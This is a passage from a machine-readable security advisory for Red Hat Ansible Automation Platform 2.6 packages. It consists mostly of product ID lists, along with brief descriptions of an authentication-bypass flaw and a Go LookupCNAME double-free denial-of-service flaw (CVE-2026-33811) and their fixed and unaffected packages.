"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "aap-gateway: aap-gateway: Authentication bypass in Event-Driven Ansible via forged HTTP header"
},
{
"cve": "CVE-2026-33811",
"cwe": {
"id": "CWE-1341",
"name": "Multiple Releases of Same Resource or Handle"
},
"discovery_date": "2026-05-07T20:01:34.913869+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467822"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net: golang: Go net package: Denial of Service via long CNAME response in LookupCNAME",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in the Go `net` package, affecting applications configured to use the `cgo` DNS resolver. A remote attacker could trigger a double-free memory error by providing a very long CNAME response, leading to a crash of the vulnerable application and impacting service availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
